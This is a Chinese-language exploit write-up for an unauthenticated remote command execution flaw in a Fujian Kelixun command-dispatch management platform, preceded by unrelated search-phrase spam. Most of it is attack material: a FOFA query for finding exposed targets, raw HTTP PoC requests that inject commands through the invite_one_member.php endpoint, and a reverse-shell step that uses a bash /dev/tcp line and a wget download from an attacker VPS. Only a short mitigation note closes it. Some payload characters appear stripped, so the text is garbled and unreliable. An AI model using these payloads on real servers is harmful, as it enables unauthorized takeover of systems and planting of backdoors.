在工商局网站做年报要交费吗,公司的网站怎么做,广州安全教育平台初始密码,网站加载慢怎么办0x01 产品简介 福建科立讯通信指挥调度管理平台是一个专门针对通信行业的管理平台。该产品旨在提供高效的指挥调度和管理解决方案#xff0c;以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能#xff0c;可以实时监控和管理通信网络设…0x01 产品简介 福建科立讯通信指挥调度管理平台是一个专门针对通信行业的管理平台。该产品旨在提供高效的指挥调度和管理解决方案以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务并即时获取现场反馈和报告。
0x02 漏洞概述 福建科立讯通信有限公司指挥调度管理平台invite_one_member.php接口处存在远程命令执行漏洞未经身份认证的攻击者可通给该漏洞远程执行命令写入后门文件可导致服务器失陷。
0x03 复现环境
FOFAbody指挥调度管理平台 0x04 漏洞复现
PoC
GET /api/client/audiobroadcast/invite_one_member.php?callee1roomidid1.txt HTTP/1.1
Host: your-ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9
Connection: close
PS漏洞没有回显可将命令结果写到txt里面或者dnslog平台验证 反弹Shell
!/bin/sh
bash -c exec bash -i /dev/tcp/VPSip/6666 01
GET /api/client/audiobroadcast/invite_one_member.php?callee1roomidwgethttp://vpsip/1.sh-O/tmp/shell.sh HTTP/1.1
Host: your-ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9
Connection: close 0x05 修复建议 关闭互联网暴露面或接口处设置访问权限 升级至安全版本
